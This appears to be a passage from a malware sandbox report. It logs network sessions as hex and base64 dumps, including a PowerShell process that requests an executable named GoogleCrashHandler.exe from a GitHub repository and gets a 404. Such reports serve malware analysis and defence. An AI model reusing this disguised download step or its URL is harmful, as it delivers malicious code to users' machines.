4c 79 67 62 45 43 34 49 70 54 61 69 74 68 77 36 68 43 34 70 41 44 5a
                                                                                              Data Ascii: c5sPwQN9NEo4BCmwCcoItGyAi3hA2OyFg4pCjgiZyYWHZIUcFQcEQcAiwRaESNiEUcRsgLcJBmViZHEpjBnLYlFbEpjBkcSpCtiVQcDsoD9MoN9Mqlb6Z3UoP0zulG+md0yYyP0yhW+nwoVsOFShh7Moo4FEDFIVsUitikGZSGMgyozcKAY8INiihggGChQw5VK30woofTG6I30+qLQw4UAxbR0ANo2TlVsUSFNiLygbEC4IpTaithw6hC4pADZ
                                                                                              2022-08-10 04:46:43 UTC66INData Raw: 32 32 45 43 0d 0a 57 77 53 67 34 63 49 67 34 63 49 44 69 71 4e 68 77 6f 6f 34 6c 42 73 55 51 63 45 47 77 52 52 77 53 70 6c 73 46 46 62 46 57 46 6f 34 6c 41 4d 53 6f 44 69 71 59 62 46 42 73 56 49 56 73 65 46 52 73 54 73 6f 6f 34 6e 5a 42 73 4f 45 41 78 56 47 77 43 6c 47 77 43 55 62 41 4a 53 4e 39 4d 49 4e 39 4d 49 4e 39 50 5a 53 72 41 77 34 52 65 55 4d 45 51 75 43 44 59 4b 4e 53 68 67 71 67 47 30 37 4b 4b 32 48 43 41 59 49 42 39 4e 51 44 36 66 4b 69 30 4d 45 41 77 51 44 41 62 49 75 4d 6c 77 47 79 69 67 62 42 73 67 58 41 4b 49 47 43 4b 55 32 71 52 53 34 71 5a 58 42 63 45 6f 55 32 63 4a 56 4c 67 64 6b 4d 46 4e 68 32 51 4b 62 46 46 49 66 54 47 36 4b 58 42 51 78 6b 68 73 43 67 55 32 44 5a 46 70 44 36 59 55 55 68 74 47 6f 55 69 6b 4e 6a 6f 4a 6d 78 51 49 62 55
                                                                                              Data Ascii: 22ECWwSg4cIg4cIDiqNhwoo4lBsUQcEGwRRwSplsFFbFWFo4lAMSoDiqYbFBsVIVseFRsTsoo4nZBsOEAxVGwClGwCUbAJSN9MIN9MIN9PZSrAw4ReUMEQuCDYKNShgqgG07KK2HCAYIB9NQD6fKi0MEAwQDAbIuMlwGyigbBsgXAKIGCKU2qRS4qZXBcEoU2cJVLgdkMFNh2QKbFFIfTG6KXBQxkhsCgU2DZFpD6YUUhtGoUikNjoJmxQIbU
                                                                                              2022-08-10 04:46:43 UTC67INData Raw: 4b 5a 39 4d 4b 4b 6d 62 4e 6c 46 54 4e 76 43 4b 6d 62 4f 46 41 68 43 6d 63 4b 6e 64 61 66 77 55 56 49 32 6f 53 6c 62 33 55 30 55 69 76 47 46 71 37 31 77 71 67 74 56 52 59 57 38 4a 67 79 63 57 75 7a 61 71 6f 74 62 61 50 76 56 52 51 57 70 67 79 6f 4c 56 57 63 72 43 31 6b 44 69 33 75 69 4b 43 31 57 49 6f 4c 56 59 5a 79 70 62 62 52 45 71 6f 74 4e 4b 71 38 68 79 6e 46 70 56 51 34 73 4b 71 48 46 68 4b 71 4b 6a 30 31 4b 48 46 69 42 78 59 67 63 65 6d 45 53 6d 46 6f 45 4d 71 68 78 5a 77 71 48 46 69 42 78 5a 77 6b 53 2f 41 77 74 56 69 48 46 71 59 77 6f 69 31 57 49 62 42 41 77 73 43 70 6e 42 73 52 73 6f 51 63 53 64 46 63 70 67 77 73 4b 5a 4d 5a 4e 39 4d 6f 47 2b 6e 79 67 4f 43 6c 44 59 4b 6f 4f 41 51 4e 67 4e 6b 79 63 6f 34 38 49 5a 77 4f 4b 45 48 45 6f 6f 34 37 4a
                                                                                              Data Ascii: KZ9MKKmbNlFTNvCKmbOFAhCmcKndafwUVI2oSlb3U0UivGFq71wqgtVRYW8JgycWuzaqotbaPvVRQWpgyoLVWcrC1kDi3uiKC1WIoLVYZypbbREqotNKq8hynFpVQ4sKqHFhKqKj01KHFiBxYgcemESmFoEMqhxZwqHFiBxZwkS/AwtViHFqYwoi1WIbBAwsCpnBsRsoQcSdFcpgwsKZMZN9MoG+nygOClDYKoOAQNgNkyco48IZwOKEHEoo47J
                                                                                              2022-08-10 04:46:43 UTC69INData Raw: 55 62 48 6c 52 52 78 51 6a 59 71 6f 32 49 55 57 44 69 46 53 4e 69 45 67 7a 44 5a 52 52 78 34 56 51 63 65 45 49 32 4a 32 53 4b 4f 4a 53 44 59 70 42 73 65 55 42 78 43 51 79 32 49 53 47 42 78 47 79 6d 65 51 35 32 78 34 53 44 4d 68 6a 44 4d 69 78 6d 43 4a 42 5a 41 4d 51 67 4f 49 32 52 57 77 34 55 47 77 56 47 77 35 55 6f 32 47 35 53 67 59 48 64 42 73 45 6f 32 48 44 71 56 51 78 47 79 44 59 42 52 57 77 47 67 43 71 42 67 6f 6f 59 49 42 69 69 78 73 53 68 47 59 37 49 51 4d 65 45 47 77 34 55 41 77 53 68 66 70 6c 52 51 50 70 6f 59 79 48 30 77 68 53 34 42 54 2f 34 76 2f 77 42 44 41 62 4b 4b 47 49 32 51 44 41 49 6c 4b 62 45 55 70 74 55 55 75 4b 42 54 61 69 6c 4e 67 52 43 47 78 46 78 53 6d 77 71 46 49 62 4f 45 55 68 73 55 43 6e 30 39 6c 46 35 45 7a 5a 33 52 53 47 78 52
                                                                                              Data Ascii: UbHlRRxQjYqo2IUWDiFSNiEgzDZRRx4VQceEI2J2SKOJSDYpBseUBxCQy2ISGBxGymeQ52x4SDMhjDMixmCJBZAMQgOI2RWw4UGwVGw5Uo2G5SgYHdBsEo2HDqVQxGyDYBRWwGgCqBgooYIBiixsShGY7IQMeEGw4UAwShfplRQPpoYyH0whS4BT/4v/wBDAbKKGI2QDAIlKbEUptUUuKBTailNgRCGxFxSmwqFIbOEUhsUCn09lF5EzZ3RSGxR
                                                                                              2022-08-10 04:46:43 UTC70INData Raw: 53 71 6c 64 62 34 4a 6c 63 59 53 75 74 51 77 6a 64 61 79 69 70 58 57 4b 4c 55 73 53 6f 31 58 6b 43 33 59 4f 75 7a 7a 71 32 32 48 5a 56 46 37 62 43 65 69 47 46 72 62 47 56 53 71 69 7a 6c 58 43 5a 57 74 73 47 69 75 45 79 72 62 59 72 55 56 46 67 32 52 46 72 62 42 73 69 4b 69 33 5a 58 47 44 4b 67 74 56 52 55 57 6f 6d 54 67 4b 77 55 74 73 56 54 4b 67 74 52 44 43 31 43 48 46 71 47 54 69 33 68 30 51 34 74 4a 30 56 77 5a 77 59 57 48 5a 41 34 39 4d 39 4f 46 52 51 57 66 65 69 47 77 43 51 6f 34 71 6f 59 57 53 67 59 57 44 5a 30 57 6d 46 69 71 43 4c 65 46 41 2b 4a 56 51 63 65 55 49 4f 4b 69 77 57 56 67 4f 4a 32 4b 45 48 41 37 4b 35 79 59 77 62 42 41 63 51 70 53 44 6a 4b 74 51 63 4a 71 73 32 4c 61 4f 43 74 53 74 67 41 64 31 43 6d 78 47 79 55 48 47 4b 4a 52 73 64 34 55
                                                                                              Data Ascii: Sqldb4JlcYSutQwjdayipXWKLUsSo1XkC3YOuzzq22HZVF7bCeiGFrbGVSqizlXCZWtsGiuEyrbYrUVFg2RFrbBsiKi3ZXGDKgtVRUWomTgKwUtsVTKgtRDC1CHFqGTi3h0Q4tJ0VwZwYWHZA49M9OFRQWfeiGwCQo4qoYWSgYWDZ0WmFiqCLeFA+JVQceUIOKiwWVgOJ2KEHA7K5yYwbBAcQpSDjKtQcJqs2LaOCtStgAd1CmxGyUHGKJRsd4U
                                                                                              2022-08-10 04:46:43 UTC71INData Raw: 42 4b 63 35 7a 44 67 55 47 77 4a 51 48 41 38 49 4e 68 30 51 48 42 30 6f 32 4a 36 70 52 73 65 45 6f 77 74 34 54 42 6c 73 66 4a 43 4d 78 66 56 53 72 47 36 68 56 49 7a 42 52 51 59 62 49 4d 41 45 4d 73 77 51 5a 76 46 46 44 45 6f 56 6d 4b 44 4d 55 56 6d 51 6a 4e 43 45 62 45 62 4b 55 67 59 65 43 44 59 64 47 51 44 45 70 52 6d 51 5a 6c 43 73 33 64 41 4d 52 73 6c 47 77 6a 33 49 42 69 6c 49 44 62 71 6b 44 48 5a 51 77 47 50 43 4c 79 46 78 45 6f 6f 47 31 6c 41 46 59 67 45 43 69 79 70 54 61 67 55 32 2b 78 52 61 51 68 46 4b 52 77 70 46 4b 62 55 69 45 4e 76 5a 52 61 6d 62 57 52 61 51 68 51 4a 64 62 32 55 69 31 4d 32 38 4b 69 5a 43 67 6d 62 65 45 56 45 32 71 4e 59 54 49 55 45 62 72 55 56 4b 36 31 53 4b 68 64 61 6f 4a 58 42 52 55 4c 72 55 56 4e 70 51 72 79 72 62 56 30 63
                                                                                              Data Ascii: BKc5zDgUGwJQHA8INh0QHB0o2J6pRseEowt4TBlsfJCMxfVSrG6hVIzBRQYbIMAEMswQZvFFDEoVmKDMUVmQjNCEbEbKUgYeCDYdGQDEpRmQZlCs3dAMRslGwj3IBilIDbqkDHZQwGPCLyFxEooG1lAFYgECiypTagU2+xRaQhFKRwpFKbUiENvZRambWRaQhQJdb2Ui1M28KiZCgmbeEVE2qNYTIUEbrUVK61SKhdaoJXBRULrUVNpQryrbV0c
                                                                                              2022-08-10 04:46:43 UTC73INData Raw: 7a 2b 35 59 7a 78 6d 78 78 69 2f 37 39 50 54 68 63 63 4a 74 73 35 6e 2b 7a 56 30 5a 64 4e 76 37 54 2b 35 61 2f 74 33 36 6e 2f 75 72 2f 41 4c 46 6a 2f 49 63 4e 76 4e 48 61 78 31 74 2f 30 50 45 62 76 56 32 63 39 54 70 48 37 48 2b 38 51 33 37 52 2b 73 4f 33 2b 67 39 54 2f 4e 57 66 38 72 77 6d 2b 30 64 72 54 31 74 66 34 7a 69 39 31 72 37 4f 65 70 30 57 66 79 39 2b 2b 33 68 37 50 32 58 39 66 63 4e 37 66 30 33 71 6e 2f 6d 72 47 66 4f 65 42 30 38 2b 33 32 65 50 35 39 50 57 31 6a 79 6a 6a 64 58 4c 6a 59 62 54 73 61 75 70 30 57 66 79 31 2b 2f 6b 67 66 37 6a 2f 58 68 39 54 2b 6e 39 51 44 78 4e 71 6d 66 50 4f 41 78 2b 76 73 2b 33 70 36 31 78 35 4e 78 2b 65 54 2f 6f 32 6e 59 31 64 53 34 2f 6c 62 2b 59 74 50 32 54 39 62 31 2b 6a 66 38 41 59 73 2f 35 2f 77 41 76 33 2b
                                                                                              Data Ascii: z+5Yzxmxxi/79PThccJts5n+zV0ZdNv7T+5a/t36n/ur/ALFj/IcNvNHax1t/0PEbvV2c9TpH7H+8Q37R+sO3+g9T/NWf8rwm+0drT1tf4zi91r7Oep0Wfy9++3h7P2X9fcN7f03qn/mrGfOeB08+32eP59PW1jyjjdXLjYbTsaup0Wfy1+/kgf7j/Xh9T+n9QDxNqmfPOAx+vs+3p61x5Nx+eT/o2nY1dS4/lb+YtP2T9b1+jf8AYs/5/wAv3+
                                                                                              2022-08-10 04:46:43 UTC74INData Raw: 31 6e 2f 41 4d 4c 70 2f 77 42 38 70 37 6a 2f 41 4e 76 33 2f 6f 50 62 33 2b 34 37 6e 31 6e 73 2f 70 50 59 35 2b 70 2b 2f 58 4e 6f 33 36 59 57 2b 2f 31 53 73 36 76 33 48 7a 38 4f 48 37 2f 30 74 61 66 32 39 78 38 64 76 33 50 71 50 2f 61 6a 30 58 50 2f 41 4a 33 66 56 76 38 41 6f 42 2f 72 46 6e 33 47 31 37 6a 48 61 7a 34 57 76 62 37 52 76 38 39 6e 36 68 48 39 4a 2f 52 64 6a 2b 39 2b 70 47 76 2b 7a 6a 2f 57 4a 37 6a 61 39 78 6a 74 66 53 76 74 39 6f 33 2b 65 7a 39 54 44 2b 6b 2f 6f 42 69 66 33 75 38 69 4d 68 39 41 44 7a 7a 4b 5a 2f 63 62 61 66 44 59 59 37 57 65 6f 39 76 74 6e 76 38 41 50 5a 2f 69 70 2f 61 6a 39 47 2f 2f 41 4b 74 36 31 50 38 41 34 56 76 32 72 48 75 4c 74 74 7a 70 36 63 39 54 66 74 2f 73 64 39 71 36 4d 64 59 6a 2b 6c 48 36 4e 32 50 37 76 36 34 66
                                                                                              Data Ascii: 1n/AMLp/wB8p7j/ANv3/oPb3+47n1ns/pPY5+p+/XNo36YW+/1Ss6v3Hz8OH7/0taf29x8dv3PqP/aj0XP/AJ3fVv8AoB/rFn3G17jHaz4Wvb7Rv89n6hH9J/Rdj+9+pGv+zj/WJ7ja9xjtfSvt9o3+ez9TD+k/oBif3u8iMh9ADzzKZ/cbafDYY7Weo9vtnv8APZ/ip/aj9G//AKt61P8A4Vv2rHuLttzp6c9Tft/sd9q6MdYj+lH6N2P7v64f
                                                                                              2022-08-10 04:46:43 UTC75INData Raw: 35 44 31 34 0d 0a 36 42 34 54 65 61 2b 37 31 42 2f 61 2f 39 6c 6b 48 39 66 38 41 72 51 33 38 54 2b 6d 33 42 6d 78 58 33 44 34 33 64 37 50 76 65 4a 50 51 50 43 62 7a 58 33 65 70 58 2b 31 33 37 42 41 50 36 7a 39 65 43 51 37 2f 41 46 50 53 39 33 30 76 69 75 65 66 33 43 34 2f 35 4e 6e 30 61 76 47 33 36 43 34 48 35 39 70 30 36 66 43 33 39 72 2f 35 66 64 6a 2b 73 2f 63 41 59 4c 66 55 39 4c 2f 55 71 65 34 58 6d 48 79 62 4c 6f 31 65 4e 66 51 58 41 2f 50 74 4f 6e 54 34 57 2f 74 66 2f 4c 7a 54 2b 73 2f 63 47 50 38 41 31 6e 70 63 66 39 53 6e 75 44 78 2f 79 62 4c 6f 31 65 4d 39 42 63 44 38 2b 30 36 64 50 68 45 66 30 74 2f 59 43 78 2f 32 76 39 77 44 30 2b 66 30 76 39 55 6e 75 46 78 2f 79 62 4c 6f 31 65 4d 39 42 63 44 38 2b 30 36 64 50 68 62 2b 31 2f 38 41 4c 37 46 76
                                                                                              Data Ascii: 5D146B4Tea+71B/a/9lkH9f8ArQ38T+m3BmxX3D43d7PveJPQPCbzX3epX+137BAP6z9eCQ7/AFPS930viuef3C4/5Nn0avG36C4H59p06fC39r/5fdj+s/cAYLfU9L/Uqe4XmHybLo1eNfQXA/PtOnT4W/tf/LzT+s/cGP8A1npcf9SnuDx/ybLo1eM9BcD8+06dPhEf0t/YCx/2v9wD0+f0v9UnuFx/ybLo1eM9BcD8+06dPhb+1/8AL7Fv
                                                                                              2022-08-10 04:46:43 UTC76INData Raw: 71 2f 77 42 5a 50 2f 6d 2f 6f 75 50 2b 72 75 2b 31 62 39 78 4e 6a 75 64 58 54 6a 71 59 39 41 62 58 66 61 65 6a 50 57 33 39 71 76 31 70 64 76 33 66 30 49 4c 48 2f 52 33 61 66 38 5a 50 63 54 59 37 6e 56 30 34 36 6a 30 42 74 74 39 70 36 4d 39 61 4a 2f 70 62 2b 35 76 2f 41 4f 70 66 70 75 75 4e 2f 77 42 69 36 65 34 66 44 62 72 58 2b 44 48 6f 48 69 4e 37 70 2f 45 50 37 58 66 75 4c 4f 66 33 50 39 4d 4f 63 62 2f 65 79 65 34 58 44 62 72 58 30 34 50 51 50 45 37 33 52 30 5a 53 2f 74 64 2b 38 45 4f 50 31 2f 36 50 48 53 66 55 2f 77 41 78 62 39 77 75 44 33 65 30 37 76 57 78 36 43 34 76 65 61 4f 39 31 42 2f 61 33 39 35 64 68 2b 76 2f 41 45 51 30 72 36 6e 2b 59 6e 75 46 77 65 37 32 6e 64 36 7a 30 48 78 65 38 30 64 37 71 53 75 2f 70 68 2b 2f 42 32 2f 57 66 6f 43 42 2f 6c
                                                                                              Data Ascii: q/wBZP/m/ouP+ru+1b9xNjudXTjqY9AbXfaejPW39qv1pdv3f0ILH/R3af8ZPcTY7nV046j0Btt9p6M9aJ/pb+5v/AOpfpuuN/wBi6e4fDbrX+DHoHiN7p/EP7XfuLOf3P9MOcb/eye4XDbrX04PQPE73R0ZS/td+8EOP1/6PHSfU/wAxb9wuD3e07vWx6C4veaO91B/a395dh+v/AEQ0r6n+YnuFwe72nd6z0Hxe80d7qSu/ph+/B2/WfoCB/l
                                                                                              2022-08-10 04:46:43 UTC77INData Raw: 34 37 69 4d 34 6d 64 70 71 36 63 39 62 65 4f 44 32 47 4d 33 47 6a 54 30 59 64 74 6e 36 48 39 49 47 50 2b 79 65 69 34 6d 33 35 41 37 36 61 4c 6e 6e 69 74 72 6e 38 2b 72 70 79 33 6a 68 74 6c 6a 38 75 4f 6a 44 75 74 2f 54 2b 6a 48 2b 69 73 66 58 35 52 48 6b 75 66 2f 62 72 2f 41 4e 63 39 4c 65 4e 6c 70 2f 30 78 30 4f 75 32 31 6d 42 32 67 72 6d 36 4f 6d 79 30 67 42 34 32 55 48 52 62 62 70 58 62 51 71 4b 72 62 61 64 53 57 66 79 51 56 74 74 50 79 74 58 51 48 37 6b 71 75 69 32 31 34 5a 76 62 37 56 42 59 57 36 43 41 2b 79 67 73 4c 54 44 47 4b 4d 67 59 53 53 42 32 5a 57 42 78 61 51 51 30 67 2b 39 4b 4b 67 4d 52 58 37 46 41 34 74 4a 66 68 77 37 6f 48 74 46 4f 36 6d 51 7a 4f 48 45 67 31 4b 4b 59 57 73 51 47 67 31 36 6f 68 73 58 49 4e 78 49 5a 2f 50 6b 49 4b 4d 42 41
                                                                                              Data Ascii: 47iM4mdpq6c9beOD2GM3GjT0Ydtn6H9IGP+yei4m35A76aLnnitrn8+rpy3jhtlj8uOjDut/T+jH+isfX5RHkuf/br/ANc9LeNlp/0x0Ou21mB2grm6Omy0gB42UHRbbpXbQqKrbadSWfyQVttPytXQH7kqui214Zvb7VBYW6CA+ygsLTDGKMgYSSB2ZWBxaQQ0g+9KKgMRX7FA4tJfhw7oHtFO6mQzOHEg1KKYWsQGg16ohsXINxIZ/PkIKMBA
                                                                                              2022-08-10 04:46:43 UTC79INData Raw: 65 55 71 72 32 57 31 4a 67 4e 56 53 69 6f 74 65 67 61 44 39 69 6c 46 37 51 53 51 78 6a 51 2b 39 53 69 67 42 4e 49 6b 73 46 51 34 6b 4d 4a 4a 70 74 31 53 69 67 74 65 43 47 49 6b 71 55 4e 61 77 74 63 53 47 6a 73 71 4b 57 36 7a 4e 31 41 64 6e 55 6f 5a 68 61 41 54 53 48 49 34 55 46 4d 57 63 30 71 53 5a 6a 7a 53 71 62 57 4b 67 4f 69 47 78 42 63 45 79 38 4e 56 4b 43 41 35 68 32 35 48 6d 37 4b 55 4f 77 4c 45 69 53 6c 55 4a 49 6d 4c 53 57 30 2b 4b 41 67 4e 30 46 52 62 48 56 57 71 4e 6f 30 32 30 36 30 53 6a 59 41 43 34 66 77 75 35 74 53 68 6d 48 79 6e 6b 6c 39 6a 35 4a 55 4e 55 47 42 53 58 34 62 68 4b 6f 57 76 69 41 52 6a 31 69 45 42 78 6c 33 63 36 68 32 53 68 6a 61 43 4d 53 5a 6f 53 66 61 55 6f 4c 6c 36 53 4e 51 32 71 44 45 55 31 74 4b 55 59 6d 68 49 4c 45 78 62
                                                                                              Data Ascii: eUqr2W1JgNVSiotegaD9ilF7QSQxjQ+9SigBNIksFQ4kMJJpt1SigteCGIkqUNawtcSGjsqKW6zN1AdnUoZhaATSHI4UFMWc0qSZjzSqbWKgOiGxBcEy8NVKCA5h25Hm7KUOwLEiSlUJImLSW0+KAgN0FRbHVWqNo02060SjYAC4fwu5tShmHynkl9j5JUNUGBSX4bhKoWviARj1iEBxl3c6h2ShjaCMSZoSfaUoLl6SNQ2qDEU1tKUYmhILExb
                                                                                              2022-08-10 04:46:43 UTC80INData Raw: 2b 52 73 69 73 4c 69 37 43 6d 33 54 52 49 44 62 6f 78 4a 44 43 50 62 6f 70 6b 41 43 35 71 30 2f 4d 2b 69 41 75 44 71 61 53 31 4a 6b 49 48 33 61 54 78 31 55 41 4e 41 43 57 47 70 39 6f 41 51 59 36 79 78 33 62 37 4e 56 51 58 6b 35 55 44 4d 58 55 47 64 78 64 4e 61 62 49 46 42 4a 41 41 49 65 5a 59 65 4b 6f 5a 77 5a 79 32 6b 62 66 69 6f 42 6b 58 78 42 4c 76 74 34 6c 49 4d 4b 6b 69 4d 51 32 53 41 67 6c 6f 4c 76 72 39 69 41 46 79 2f 7a 41 47 36 6f 49 64 69 67 4c 6b 6b 6e 52 33 66 70 2b 43 41 41 32 67 37 50 76 57 45 47 79 75 49 41 61 6f 49 34 53 41 6c 67 57 5a 7a 4a 5a 6b 47 6b 4e 6f 47 4a 78 72 4b 45 59 6d 34 69 43 2b 67 4c 66 59 67 33 46 70 46 70 31 6a 34 49 51 41 43 7a 45 42 32 44 61 30 36 6f 51 48 31 42 72 4c 69 76 32 71 77 61 30 30 4c 4f 34 66 57 75 69 42 69
                                                                                              Data Ascii: +RsisLi7Cm3TRIDboxJDCPbopkAC5q0/M+iAuDqaS1JkIH3aTx1UANACWGp9oAQY6yx3b7NVQXk5UDMXUGdxdNabIFBJAAIeZYeKoZwZy2kbfioBkXxBLvt4lIMKkiMQ2SAgloLvr9iAFy/zAG6oIdigLkknR3fp+CAA2g7PvWEGyuIAaoI4SAlgWZzJZkGkNoGJxrKEYm4iC+gLfYg3FpFp1j4IQACzEB2Da06oQH1BrLiv2qwa00LO4fWuiBi


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              1192.168.11.2049805140.82.121.4443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2022-08-10 04:47:09 UTC81OUTGET /gowgerrie/reborn/raw/main/04/GoogleCrashHandler.exe HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                              Host: github.com
                                                                                              Connection: Keep-Alive
                                                                                              2022-08-10 04:47:09 UTC82INHTTP/1.1 404 Not Found
                                                                                              Server: GitHub.com
                                                                                              Date: Wed, 10 Aug 2022 04:47:09 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                              permissions-policy: interest-cohort=()
                                                                                              Cache-Control: no-cache
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                              X-Frame-Options: deny
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                              Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                              2022-08-10 04:47:09 UTC82INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                              Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.
                                                                                              2022-08-10 04:47:09 UTC84INData Raw: 46 30 41 34 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 3e 0a 20
                                                                                              Data Ascii: F0A4<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com">
                                                                                              2022-08-10 04:47:09 UTC84INData Raw: 75 64 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 72 2d 69 6d 61 67 65 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22 3e 0a 0a 0a 0a 20 20 3c 6c
                                                                                              Data Ascii: ud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <l
                                                                                              2022-08-10 04:47:09 UTC86INData Raw: 69 61 3d 22 61 6c 6c 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 55 52 50 53 76 69 43 77 34 6d 34 6e 37 31 49 4b 6e 34 71 79 75 37 4d 45 44 70 47 62 43 69 54 66 73 4d 54 4e 72 55 6a 50 77 63 67 33 38 4b 74 45 4b 44 74 31 32 76 7a 6a 6c 4e 7a 6f 79 33 59 44 46 69 51 38 44 30 54 43 43 59 4b 43 74 72 5a 70 71 58 30 39 37 67 3d 3d 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 35 31 31 33 64 32 62 65 32 30 62 30 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72
                                                                                              Data Ascii: ia="all" integrity="sha512-URPSviCw4m4n71IKn4qyu7MEDpGbCiTfsMTNrUjPwcg38KtEKDt12vzjlNzoy3YDFiQ8D0TCCYKCtrZpqX097g==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-5113d2be20b0.css" /><link data-color-theme="light_color
                                                                                              2022-08-10 04:47:09 UTC87INData Raw: 30 66 30 37 38 62 2e 63 73 73 22 20 2f 3e 0a 20 20 0a 20 20 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 53 55 71 79 45 51 6f 71 69 79 62 46 34 54 47 64 4c 48 30 74 68 34 76 44 4c 39 49 39 45 46 47 54 58 66 63 74 68 39 43 49 56 41 6f 4e 65 51 4a 66 41 79 66 75 38 4d 74 6d 4f 4d 57 62 47 6e 71 50 36 56 78 46 49 51 36 56 64 44 48 78 68 64 58 4e 47 31 6b 2f 2f 51 3d 3d 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 70 72 69 6d 65 72 2d 34 39 34 61 62 32 31 31 30 61 32 61 2e 63
